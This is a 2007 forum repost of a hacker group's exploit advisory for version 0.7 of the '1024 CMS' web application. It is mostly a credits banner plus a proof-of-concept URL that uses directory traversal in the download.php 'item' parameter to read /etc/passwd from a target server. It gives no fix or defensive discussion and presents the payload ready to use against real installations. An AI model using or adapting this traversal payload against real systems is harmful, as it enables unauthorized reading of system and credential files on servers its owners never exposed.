virusz Posted May 12, 2007 Report Posted May 12, 2007 \#'#/ (-.-) --------------------oOO---(_)---OOo------------------- | [ Y! Underground Group ] | | [ [url]www.dj7xpl.2600.ir[/url] ] | | [ Dj7xpl @ 2600.ir ] | ------------------------------------------------------<---------------------------------------------------------------------------------------------------------------------> [!] Portal : 1024 CMS Version 0.7 [!] Vendor : [url]http://www.treble.lfhost.com[/url] [!] Author : Dj7xpl [!] Type : Remote File Disclosure Vuln [!] We Are : Y4Ho0 -Mr.Mithridates -Sir SiSiLi -System Failure -Satanic Soulfull -And Me<---------------------------------------------------------------------------------------------------------------------><--------------------------------------------------------------------------------------------------------------------->PoC :[url]http://[Target]/[/url][Path]/includes/download.php?item=../uploads/[File][url]http://Target.com/1024/includes/download.php?item=../uploads/../../../../../etc/passwd[/url]<---------------------------------------------------------------------------------------------------------------------> Quote